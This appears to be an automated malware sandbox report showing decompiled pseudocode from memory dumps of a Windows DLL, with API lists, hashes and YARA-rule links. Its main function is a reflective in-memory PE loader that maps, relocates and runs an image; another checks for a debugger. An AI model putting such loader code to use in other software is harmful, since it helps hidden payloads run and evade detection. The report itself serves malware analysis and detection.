Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7fa555aadc6c4c6973dacded05396da63d9d4cddd5499b8640794b978325bcef
Instruction ID: b7b1b8910a81d0bd56b3e64b17b44260ba1a498cf66a7dcfbb49416a3aa6feb1
Opcode Fuzzy Hash: 7fa555aadc6c4c6973dacded05396da63d9d4cddd5499b8640794b978325bcef
Instruction Fuzzy Hash: 65E0ED3110876067FB14DA79DD00B9B7A8C9FC2BB4F100126EC58AA6C3DB21E96181B0

Uniqueness

Uniqueness Score: -1.00%

Function 6F31C650, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F31C650() {

				E6F301299();
				ExitProcess(0);
			}

0x6f31c650
0x6f31c657

APIs

Part of subcall function 6F301299: WaitForSingleObject.KERNEL32(000000FF,6F31C655,6F301290,?,CreateProcessA), ref: 6F3012A1

ExitProcess.KERNEL32 ref: 6F31C657

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: ExitObjectProcessSingleWait
String ID:
API String ID: 3568891979-0
Opcode ID: f54515fdcf9592cc628ff58402236673b55b603f4dc92b736c7fca3f4827f525
Instruction ID: 41000e47bb5948f0d169b276e97d1d348774bf07d95e6cd711ed16820f769b60
Opcode Fuzzy Hash: f54515fdcf9592cc628ff58402236673b55b603f4dc92b736c7fca3f4827f525
Instruction Fuzzy Hash: 1590027414870166D95037644409718261C5701A3EF00400EA14D980C04E6001945595

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6F31BB30, Relevance: 14.0, APIs: 9, Instructions: 493
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E6F31BB30(void* __ebx, signed int* __ecx, signed int __edx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v40;
				char _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int _v56;
				void* _v60;
				long _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				long _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _v92;
				signed int _v96;
				intOrPtr _v100;
				signed int _t198;
				void* _t209;
				long _t212;
				intOrPtr _t221;
				void _t235;
				void* _t237;
				signed int _t239;
				long _t240;
				signed int _t242;
				intOrPtr _t245;
				long _t248;
				intOrPtr* _t253;
				signed int* _t255;
				signed int* _t258;
				signed int _t264;
				signed int _t265;
				signed char _t266;
				intOrPtr _t267;
				signed int _t270;
				void* _t279;
				void* _t288;
				void* _t293;
				intOrPtr _t294;
				signed int _t297;
				void _t298;
				intOrPtr _t299;
				intOrPtr* _t301;
				intOrPtr* _t302;
				long _t306;
				signed char _t307;
				signed int _t308;
				intOrPtr _t312;
				void _t314;
				signed int _t318;
				signed int _t319;
				void _t321;
				intOrPtr _t329;
				intOrPtr _t333;
				void* _t336;
				signed int* _t339;
				void* _t341;
				signed int _t343;
				intOrPtr _t345;
				intOrPtr _t346;
				void _t348;
				signed int _t353;
				signed short* _t354;
				void* _t355;
				signed int _t358;
				long _t361;
				void* _t362;
				intOrPtr _t367;
				intOrPtr _t368;
				long _t369;
				long _t371;
				signed int _t375;
				void* _t376;
				long _t379;
				intOrPtr _t380;
				intOrPtr* _t384;
				signed int _t388;
				void* _t390;
				intOrPtr _t392;
				long _t394;
				intOrPtr _t395;
				signed int _t396;
				void* _t397;
				void* _t398;

				_t198 =  *0x6f34609c; // 0x206de7d6
				_v8 = _t198 ^ _t396;
				_t339 = __ecx;
				_push(__esi);
				_t371 = 0;
				_v56 = __edx;
				_v48 = __ecx;
				_push(__edi);
				if(__edx < 0x40) {
					L3:
					_push(0xd);
					goto L88;
				} else {
					if( *__ecx != 0x5a4d) {
						L87:
						_push(0xc1);
						goto L88;
					} else {
						_t4 = _t339 + 0x3c; // 0xcccccccc
						_t306 =  *_t4;
						_v72 = _t306;
						_t6 = _t306 + 0xf8; // 0xcccccdc4
						if(__edx >= _t6) {
							_t297 = _t306 + __ecx;
							_v68 = _t297;
							if( *(_t306 + __ecx) != 0x4550 ||  *((intOrPtr*)(_t297 + 4)) != 0x14c) {
								goto L87;
							} else {
								_t307 =  *(_t297 + 0x38);
								if((_t307 & 0x00000001) != 0) {
									goto L87;
								} else {
									_t358 =  *(_t297 + 6) & 0x0000ffff;
									_t341 = ( *(_t297 + 0x14) & 0x0000ffff) + 0x24;
									if(_t358 != 0) {
										_t355 = _t341 + _t297;
										do {
											_t294 =  *((intOrPtr*)(_t355 + 4));
											_t355 = _t355 + 0x28;
											_t335 =  !=  ? _t294 : _t307;
											_t336 = ( !=  ? _t294 : _t307) +  *((intOrPtr*)(_t355 - 0x28));
											_t337 =  <=  ? _t371 : _t336;
											_t371 =  <=  ? _t371 : _t336;
											_t307 =  *(_t297 + 0x38);
											_t358 = _t358 - 1;
										} while (_t358 != 0);
									}
									__imp__GetNativeSystemInfo( &_v44);
									_t308 = _v40;
									_t343 =  !(_t308 - 1);
									_t361 = _t308 - 0x00000001 +  *((intOrPtr*)(_t297 + 0x50)) & _t343;
									if(_t361 != (_t308 - 0x00000001 + _t371 & _t343)) {
										goto L87;
									} else {
										_t209 = VirtualAlloc( *(_t297 + 0x34), _t361, 0x3000, 4);
										_v60 = _t209;
										if(_t209 != 0) {
											L13:
											_v100 = GetProcessHeap;
											_t212 = HeapAlloc(GetProcessHeap(), 8, 0x44);
											_t362 = _t212;
											_v76 = _t362;
											if(_t362 != 0) {
												 *((intOrPtr*)(_t362 + 4)) = _v60;
												 *((intOrPtr*)(_t362 + 0x1c)) = E6F31BA90;
												 *(_t362 + 0x14) = ( *(_t297 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
												 *((intOrPtr*)(_t362 + 0x20)) = E6F31BAB0;
												 *((intOrPtr*)(_t362 + 0x24)) = E6F31BAD0;
												 *((intOrPtr*)(_t362 + 0x28)) = E6F31BAE0;
												 *((intOrPtr*)(_t362 + 0x2c)) = E6F31BB00;
												 *(_t362 + 0x34) = 0;
												 *(_t362 + 0x40) = _v40;
												if(E6F31B840(_v56,  *(_t297 + 0x54)) == 0) {
													L33:
													E6F31E93F( *((intOrPtr*)(_t362 + 0x30)));
													_t220 =  *((intOrPtr*)(_t362 + 8));
													_t398 = _t397 + 4;
													if( *((intOrPtr*)(_t362 + 8)) != 0) {
														_t375 = 0;
														if( *((intOrPtr*)(_t362 + 0xc)) > 0) {
															do {
																_t220 =  *((intOrPtr*)(_t362 + 8));
																_t312 =  *((intOrPtr*)( *((intOrPtr*)(_t362 + 8)) + _t375 * 4));
																if(_t312 != 0) {
																	 *((intOrPtr*)( *((intOrPtr*)(_t362 + 0x2c))))(_t312,  *(_t362 + 0x34));
																	_t220 =  *((intOrPtr*)(_t362 + 8));
																	_t398 = _t398 + 8;
																}
																_t375 = _t375 + 1;
															} while (_t375 <  *((intOrPtr*)(_t362 + 0xc)));
														}
														E6F31E93F(_t220);
														_t398 = _t398 + 4;
													}
													_t221 =  *((intOrPtr*)(_t362 + 4));
													if(_t221 != 0) {
														 *((intOrPtr*)( *((intOrPtr*)(_t362 + 0x20))))(_t221, 0, 0x8000,  *(_t362 + 0x34));
													}
													HeapFree(_v100(), 0, _t362);
													return E6F31C65E(_v8 ^ _t396);
												} else {
													_t376 = VirtualAlloc(_v60,  *(_t297 + 0x54), 0x1000, 4);
													E6F31DD40(_t376, _v48,  *(_t297 + 0x54));
													_t397 = _t397 + 0xc;
													_v64 = 0;
													_t235 = _v48[0xf] + _t376;
													 *_t362 = _t235;
													 *((intOrPtr*)(_t235 + 0x34)) = _v60;
													_t314 =  *_t362;
													_t345 =  *((intOrPtr*)(_t362 + 4));
													_v52 = _t345;
													_t237 = ( *(_t314 + 0x14) & 0x0000ffff) + 0x24;
													if(0 >=  *(_t314 + 6)) {
														L29:
														_t239 =  *((intOrPtr*)(_t314 + 0x34)) -  *(_t297 + 0x34);
														_v68 = _t239;
														if(_t239 == 0) {
															L51:
															_t240 = 1;
														} else {
															if( *((intOrPtr*)(_t314 + 0xa4)) != 0) {
																_t353 =  *((intOrPtr*)(_t362 + 4));
																_t301 =  *((intOrPtr*)(_t314 + 0xa0)) + _t353;
																_v56 = _t353;
																_t267 =  *_t301;
																if(_t267 != 0) {
																	do {
																		_t329 =  *((intOrPtr*)(_t301 + 4));
																		_v72 = _t267 + _t353;
																		_t354 = _t301 + 8;
																		_t390 = 0;
																		if((_t329 - 0x00000008 & 0xfffffffe) > 0) {
																			_t369 = _v72;
																			do {
																				_t270 =  *_t354 & 0x0000ffff;
																				if((_t270 & 0x0000f000) == 0x3000) {
																					 *((intOrPtr*)((_t270 & 0x00000fff) + _t369)) =  *((intOrPtr*)((_t270 & 0x00000fff) + _t369)) + _v68;
																				}
																				_t329 =  *((intOrPtr*)(_t301 + 4));
																				_t390 = _t390 + 1;
																				_t354 =  &(_t354[1]);
																			} while (_t390 < _t329 - 8 >> 1);
																		}
																		_t267 =  *((intOrPtr*)(_t301 + _t329));
																		_t301 = _t301 + _t329;
																		_t353 = _v56;
																	} while (_t267 != 0);
																	_t362 = _v76;
																}
																goto L51;
															} else {
																_t240 = 0;
															}
														}
														 *(_t362 + 0x18) = _t240;
														if(E6F31B920(_t362) == 0) {
															goto L33;
														} else {
															_t298 =  *_t362;
															_t379 = ( *(_t298 + 0x14) & 0x0000ffff) + _t298;
															_t242 =  *(_t379 + 0x20);
															_t318 =  ~( *(_t362 + 0x40)) & _t242;
															_t346 =  *((intOrPtr*)(_t379 + 0x28));
															_v64 = _t242;
															_v96 = _t242;
															_v68 = _t318;
															_v92 = _t318;
															if(_t346 == 0) {
																_t266 =  *(_t379 + 0x3c);
																if((_t266 & 0x00000040) == 0) {
																	if(_t266 < 0) {
																		_t346 =  *((intOrPtr*)(_t298 + 0x24));
																	}
																} else {
																	_t346 =  *((intOrPtr*)(_t298 + 0x20));
																}
															}
															_t319 =  *(_t379 + 0x3c);
															_v88 = _t346;
															_v84 = _t319;
															_v80 = 0;
															_v72 = 1;
															if(1 >=  *(_t298 + 6)) {
																L75:
																_v80 = 1;
																if(E6F31B860(_t298, _t362,  &_v96, _t362, _t379) == 0) {
																	goto L33;
																} else {
																	_t348 =  *_t362;
																	_t321 = _t348;
																	_t380 =  *((intOrPtr*)(_t348 + 0xc0));
																	if(_t380 != 0) {
																		_t299 =  *((intOrPtr*)(_t362 + 4));
																		_t384 =  *((intOrPtr*)(_t380 + _t299 + 0xc));
																		if(_t384 != 0) {
																			_t253 =  *_t384;
																			if(_t253 != 0) {
																				do {
																					 *_t253(_t299, 1, 0);
																					_t253 =  *((intOrPtr*)(_t384 + 4));
																					_t384 = _t384 + 4;
																				} while (_t253 != 0);
																				_t321 =  *_t362;
																			}
																		}
																	}
																	_t245 =  *((intOrPtr*)(_t321 + 0x28));
																	if(_t245 == 0) {
																		 *(_t362 + 0x38) = 0;
																		return E6F31C65E(_v8 ^ _t396);
																	} else {
																		_t248 = _t245 + _v60;
																		if( *(_t362 + 0x14) == 0) {
																			 *(_t362 + 0x38) = _t248;
																			return E6F31C65E(_v8 ^ _t396);
																		} else {
																			 *(_t362 + 0x3c) = _t248;
																			 *(_t362 + 0x10) = 1;
																			return E6F31C65E(_v8 ^ _t396);
																		}
																	}
																}
															} else {
																_t255 = _t379 + 0x64;
																_v48 = _t255;
																do {
																	_v56 =  *((intOrPtr*)(_t255 - 0x1c));
																	_t367 =  *((intOrPtr*)(_t255 - 0x14));
																	_t388 =  ~( *(_t362 + 0x40)) & _v56;
																	_v52 = _t367;
																	_t362 = _v76;
																	if(_t367 == 0) {
																		if(( *_t255 & 0x00000040) == 0) {
																			if(( *_t255 & 0x00000080) != 0) {
																				_t368 =  *((intOrPtr*)(_t298 + 0x24));
																				goto L65;
																			}
																		} else {
																			_t368 =  *((intOrPtr*)(_t298 + 0x20));
																			L65:
																			_v52 = _t368;
																			_t362 = _v76;
																		}
																	}
																	if(_v68 == _t388) {
																		L71:
																		_t319 = _t319 |  *_t255;
																		asm("bt eax, 0x19");
																		if(_t319 >= 0) {
																			_t319 = _t319 & 0xfdffffff;
																		}
																		_t346 = _v52 - _v64 + _v56;
																		_t258 = _v48;
																		goto L74;
																	} else {
																		if(_v64 + _t346 > _t388) {
																			_t255 = _v48;
																			goto L71;
																		} else {
																			if(E6F31B860(_t298, _t362,  &_v96, _t362, _t388) == 0) {
																				goto L33;
																			} else {
																				_t264 = _v56;
																				_t346 = _v52;
																				_t298 =  *_t362;
																				_v64 = _t264;
																				_v96 = _t264;
																				_t265 = _t388;
																				_v68 = _t265;
																				_v92 = _t265;
																				_t258 = _v48;
																				_t319 =  *_t258;
																				goto L74;
																			}
																		}
																	}
																	goto L89;
																	L74:
																	_v48 =  &(_t258[0xa]);
																	_t379 = _v72 + 1;
																	_v84 = _t319;
																	_t255 = _v48;
																	_v88 = _t346;
																	_v72 = _t379;
																} while (_t379 < ( *(_t298 + 6) & 0x0000ffff));
																goto L75;
															}
														}
													} else {
														_t302 = _t237 + _t314;
														do {
															_t333 =  *((intOrPtr*)(_t302 + 4));
															if(_t333 != 0) {
																if(_v56 <  *((intOrPtr*)(_t302 + 8)) + _t333) {
																	SetLastError(0xd);
																	goto L33;
																} else {
																	_t279 =  *((intOrPtr*)( *((intOrPtr*)(_t362 + 0x1c))))( *_t302 + _t345, _t333, 0x1000, 4,  *(_t362 + 0x34));
																	_t397 = _t397 + 0x14;
																	if(_t279 == 0) {
																		goto L33;
																	} else {
																		_t392 =  *_t302 + _v52;
																		E6F31DD40(_t392,  *((intOrPtr*)(_t302 + 8)) + _v48,  *((intOrPtr*)(_t302 + 4)));
																		 *((intOrPtr*)(_t302 - 4)) = _t392;
																		goto L26;
																	}
																}
															} else {
																_t395 =  *((intOrPtr*)( &(_v48[0xe]) + _v72));
																if(_t395 <= 0) {
																	goto L27;
																} else {
																	_t288 =  *((intOrPtr*)( *((intOrPtr*)(_t362 + 0x1c))))( *_t302 + _t345, _t395, 0x1000, 4,  *(_t362 + 0x34));
																	_t397 = _t397 + 0x14;
																	if(_t288 == 0) {
																		goto L33;
																	} else {
																		 *((intOrPtr*)(_t302 - 4)) =  *_t302 + _v52;
																		E6F31D230(_t362,  *_t302 + _v52, 0, _t395);
																		L26:
																		_t345 = _v52;
																		_t397 = _t397 + 0xc;
																		goto L27;
																	}
																}
															}
															goto L89;
															L27:
															_t314 =  *_t362;
															_t302 = _t302 + 0x28;
															_t394 = _v64 + 1;
															_v64 = _t394;
														} while (_t394 < ( *(_t314 + 6) & 0x0000ffff));
														_t297 = _v68;
														goto L29;
													}
												}
											} else {
												VirtualFree(_v60, _t212, 0x8000);
												goto L15;
											}
										} else {
											_t293 = VirtualAlloc(_t209, _t361, 0x3000, 4);
											_v60 = _t293;
											if(_t293 == 0) {
												L15:
												_push(0xe);
												L88:
												SetLastError();
												return E6F31C65E(_v8 ^ _t396);
											} else {
												goto L13;
											}
										}
									}
								}
							}
						} else {
							goto L3;
						}
					}
				}
				L89:
			}

0x6f31bb36
0x6f31bb3d
0x6f31bb43
0x6f31bb45
0x6f31bb46
0x6f31bb48
0x6f31bb4b
0x6f31bb4e
0x6f31bb52
0x6f31bb72
0x6f31bb72
0x00000000
0x6f31bb54
0x6f31bb5c
0x6f31c0b0
0x6f31c0b0
0x00000000
0x6f31bb62
0x6f31bb62
0x6f31bb62
0x6f31bb65
0x6f31bb68
0x6f31bb70
0x6f31bb80
0x6f31bb83
0x6f31bb86
0x00000000
0x6f31bb9b
0x6f31bb9b
0x6f31bba1
0x00000000
0x6f31bba7
0x6f31bbab
0x6f31bbaf
0x6f31bbb4
0x6f31bbb6
0x6f31bbb8
0x6f31bbb8
0x6f31bbbb
0x6f31bbc0
0x6f31bbc3
0x6f31bbc8
0x6f31bbcb
0x6f31bbcd
0x6f31bbd0
0x6f31bbd0
0x6f31bbb8
0x6f31bbd9
0x6f31bbdf
0x6f31bbe8
0x6f31bbf2
0x6f31bbf8
0x00000000
0x6f31bbfe
0x6f31bc0f
0x6f31bc11
0x6f31bc16
0x6f31bc2a
0x6f31bc33
0x6f31bc39
0x6f31bc3f
0x6f31bc41
0x6f31bc46
0x6f31bc64
0x6f31bc71
0x6f31bc78
0x6f31bc7b
0x6f31bc82
0x6f31bc89
0x6f31bc90
0x6f31bc97
0x6f31bca1
0x6f31bcae
0x6f31bde2
0x6f31bde5
0x6f31bdea
0x6f31bded
0x6f31bdf2
0x6f31bdf4
0x6f31bdf9
0x6f31be00
0x6f31be00
0x6f31be03
0x6f31be08
0x6f31be11
0x6f31be13
0x6f31be16
0x6f31be16
0x6f31be19
0x6f31be1a
0x6f31be00
0x6f31be20
0x6f31be25
0x6f31be25
0x6f31be28
0x6f31be2d
0x6f31be3d
0x6f31be3f
0x6f31be49
0x6f31be61
0x6f31bcb4
0x6f31bcc6
0x6f31bccc
0x6f31bcd4
0x6f31bcda
0x6f31bce4
0x6f31bce8
0x6f31bcea
0x6f31bced
0x6f31bcef
0x6f31bcf2
0x6f31bcf9
0x6f31bd00
0x6f31bdb7
0x6f31bdba
0x6f31bdbd
0x6f31bdc0
0x6f31becd
0x6f31becd
0x6f31bdc6
0x6f31bdcd
0x6f31be62
0x6f31be6b
0x6f31be6d
0x6f31be70
0x6f31be74
0x6f31be76
0x6f31be76
0x6f31be7b
0x6f31be7e
0x6f31be81
0x6f31be8b
0x6f31be8d
0x6f31be90
0x6f31be90
0x6f31bea1
0x6f31beab
0x6f31beab
0x6f31beae
0x6f31beb1
0x6f31beb2
0x6f31beba
0x6f31be90
0x6f31bebe
0x6f31bec1
0x6f31bec3
0x6f31bec6
0x6f31beca
0x6f31beca
0x00000000
0x6f31bdd3
0x6f31bdd3
0x6f31bdd3
0x6f31bdcd
0x6f31bed4
0x6f31bede
0x00000000
0x6f31bee4
0x6f31bee4
0x6f31beef
0x6f31bef1
0x6f31bef4
0x6f31bef6
0x6f31bef9
0x6f31befc
0x6f31beff
0x6f31bf02
0x6f31bf07
0x6f31bf09
0x6f31bf0e
0x6f31bf17
0x6f31bf19
0x6f31bf19
0x6f31bf10
0x6f31bf10
0x6f31bf10
0x6f31bf0e
0x6f31bf1c
0x6f31bf24
0x6f31bf27
0x6f31bf2a
0x6f31bf31
0x6f31bf3c
0x6f31c005
0x6f31c008
0x6f31c018
0x00000000
0x6f31c01e
0x6f31c01e
0x6f31c020
0x6f31c022
0x6f31c02a
0x6f31c02c
0x6f31c02f
0x6f31c035
0x6f31c037
0x6f31c03b
0x6f31c040
0x6f31c045
0x6f31c047
0x6f31c04a
0x6f31c04d
0x6f31c051
0x6f31c051
0x6f31c03b
0x6f31c035
0x6f31c053
0x6f31c058
0x6f31c096
0x6f31c0af
0x6f31c05a
0x6f31c05a
0x6f31c061
0x6f31c080
0x6f31c095
0x6f31c063
0x6f31c063
0x6f31c068
0x6f31c07f
0x6f31c07f
0x6f31c061
0x6f31c058
0x6f31bf42
0x6f31bf42
0x6f31bf45
0x6f31bf50
0x6f31bf53
0x6f31bf59
0x6f31bf5e
0x6f31bf63
0x6f31bf66
0x6f31bf69
0x6f31bf6e
0x6f31bf78
0x6f31bf7a
0x00000000
0x6f31bf7a
0x6f31bf70
0x6f31bf70
0x6f31bf7d
0x6f31bf7d
0x6f31bf80
0x6f31bf80
0x6f31bf6e
0x6f31bf86
0x6f31bfc3
0x6f31bfc9
0x6f31bfcb
0x6f31bfcf
0x6f31bfd1
0x6f31bfd1
0x6f31bfdd
0x6f31bfe0
0x00000000
0x6f31bf88
0x6f31bf8f
0x6f31bfc0
0x00000000
0x6f31bf91
0x6f31bf9d
0x00000000
0x6f31bfa3
0x6f31bfa3
0x6f31bfa6
0x6f31bfa9
0x6f31bfab
0x6f31bfae
0x6f31bfb1
0x6f31bfb3
0x6f31bfb6
0x6f31bfb9
0x6f31bfbc
0x00000000
0x6f31bfbc
0x6f31bf9d
0x6f31bf8f
0x00000000
0x6f31bfe3
0x6f31bfe9
0x6f31bfec
0x6f31bff3
0x6f31bff6
0x6f31bff9
0x6f31bffc
0x6f31bffc
0x00000000
0x6f31bf50
0x6f31bf3c
0x6f31bd06
0x6f31bd06
0x6f31bd10
0x6f31bd10
0x6f31bd15
0x6f31bd60
0x6f31bddc
0x00000000
0x6f31bd62
0x6f31bd75
0x6f31bd77
0x6f31bd7c
0x00000000
0x6f31bd7e
0x6f31bd89
0x6f31bd8e
0x6f31bd93
0x00000000
0x6f31bd93
0x6f31bd7c
0x6f31bd17
0x6f31bd1d
0x6f31bd23
0x00000000
0x6f31bd25
0x6f31bd38
0x6f31bd3a
0x6f31bd3f
0x00000000
0x6f31bd45
0x6f31bd4e
0x6f31bd51
0x6f31bd96
0x6f31bd96
0x6f31bd99
0x00000000
0x6f31bd99
0x6f31bd3f
0x6f31bd23
0x00000000
0x6f31bd9c
0x6f31bd9c
0x6f31bd9e
0x6f31bda4
0x6f31bda5
0x6f31bdac
0x6f31bdb4
0x00000000
0x6f31bdb4
0x6f31bd00
0x6f31bc48
0x6f31bc51
0x00000000
0x6f31bc51
0x6f31bc18
0x6f31bc21
0x6f31bc23
0x6f31bc28
0x6f31bc57
0x6f31bc57
0x6f31c0b5
0x6f31c0b5
0x6f31c0cd
0x00000000
0x00000000
0x00000000
0x6f31bc28
0x6f31bc16
0x6f31bbf8
0x6f31bba1
0x00000000
0x00000000
0x00000000
0x6f31bb70
0x6f31bb5c
0x00000000

APIs

GetNativeSystemInfo.KERNEL32(?,-00000017,00000000,00000000), ref: 6F31BBD9
VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 6F31BC0F
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 6F31BC21
HeapAlloc.KERNEL32(00000000), ref: 6F31BC39
VirtualFree.KERNEL32(?,00000000,00008000), ref: 6F31BC51

Part of subcall function 6F31B840: SetLastError.KERNEL32(0000000D,6F31BCAC), ref: 6F31B846

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 6F31BCC1
SetLastError.KERNEL32(0000000D), ref: 6F31BDDC
HeapFree.KERNEL32(00000000), ref: 6F31BE49
SetLastError.KERNEL32(0000000D,-00000017,00000000,00000000), ref: 6F31C0B5

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual$ErrorLast$FreeHeap$InfoNativeSystem
String ID:
API String ID: 2732102410-0
Opcode ID: b65428b6644ebe357e0d4c09bf4180888e04ac2617c07ce9c6397530c3e00b80
Instruction ID: 8b248c96a90d90837d8586d47a83352f336397b95bc9f43f9b5d7af2c6ca312f
Opcode Fuzzy Hash: b65428b6644ebe357e0d4c09bf4180888e04ac2617c07ce9c6397530c3e00b80
Instruction Fuzzy Hash: B9128A71A04619DFDB18CFA8C980BA9B7B5FF48344F14816AE919AF781D732E851CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6F31FF39, Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E6F31FF39(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4, char _a8, char _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0x6f34609c; // 0x206de7d6
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E6F31CFBC(_t41);
					_pop(_t62);
				}
				E6F31D230(_t67,  &_v804, 0, 0x50);
				E6F31D230(_t67,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_t23 =  &_v0; // 0x5f000001
				_v540 =  *_t23;
				_t25 =  &_v0; // 0x6f319ed2
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_t28 = _t49 - 4; // 0x3c248c8b
				_v544 =  *_t28;
				_t30 =  &_a8; // 0x2780
				_v804 =  *_t30;
				_t32 =  &_a12; // 0xc35de58b
				_v800 =  *_t32;
				_t34 =  &_v0; // 0x5f000001
				_v792 =  *_t34;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // 0x6f319ba6
				if(UnhandledExceptionFilter(_t36) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_t38 =  &_a4; // 0xe8cc335e
					_push( *_t38);
					E6F31CFBC(_t57);
				}
				_t39 =  &_v8; // 0xfffe8141
				return E6F31C65E( *_t39 ^ _t70);
			}

0x6f31ff39
0x6f31ff39
0x6f31ff39
0x6f31ff39
0x6f31ff44
0x6f31ff49
0x6f31ff4b
0x6f31ff53
0x6f31ff55
0x6f31ff58
0x6f31ff5d
0x6f31ff5d
0x6f31ff69
0x6f31ff7c
0x6f31ff8a
0x6f31ff90
0x6f31ff96
0x6f31ff9c
0x6f31ffa2
0x6f31ffa8
0x6f31ffae
0x6f31ffb4
0x6f31ffba
0x6f31ffc0
0x6f31ffc7
0x6f31ffce
0x6f31ffd5
0x6f31ffdc
0x6f31ffe3
0x6f31ffea
0x6f31ffeb
0x6f31fff1
0x6f31fff4
0x6f31fffa
0x6f31fffa
0x6f31fffd
0x6f320003
0x6f32000d
0x6f320010
0x6f320016
0x6f320019
0x6f32001f
0x6f320022
0x6f320028
0x6f32002b
0x6f320039
0x6f32003b
0x6f320041
0x6f320050
0x6f32005c
0x6f32005c
0x6f32005f
0x6f320064
0x6f320065
0x6f320073

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,6F31C0D0), ref: 6F320031
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,6F31C0D0), ref: 6F32003B
UnhandledExceptionFilter.KERNEL32(6F319BA6,?,?,?,?,?,6F31C0D0), ref: 6F320048

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 86e0d2488685ab1ffcc6375913afb68855aec09e1ea47f3f9c399e1f586f6472
Instruction ID: 780508168f0ac33780a6332abfb9b9c9317a2deb71d6d1148274a2ced73e64fc
Opcode Fuzzy Hash: 86e0d2488685ab1ffcc6375913afb68855aec09e1ea47f3f9c399e1f586f6472
Instruction Fuzzy Hash: A231C8B490532CABCB21DF64D9887CDB7B8BF08310F5081EAE51CA7290EB759B858F54

Uniqueness

Uniqueness Score: -1.00%

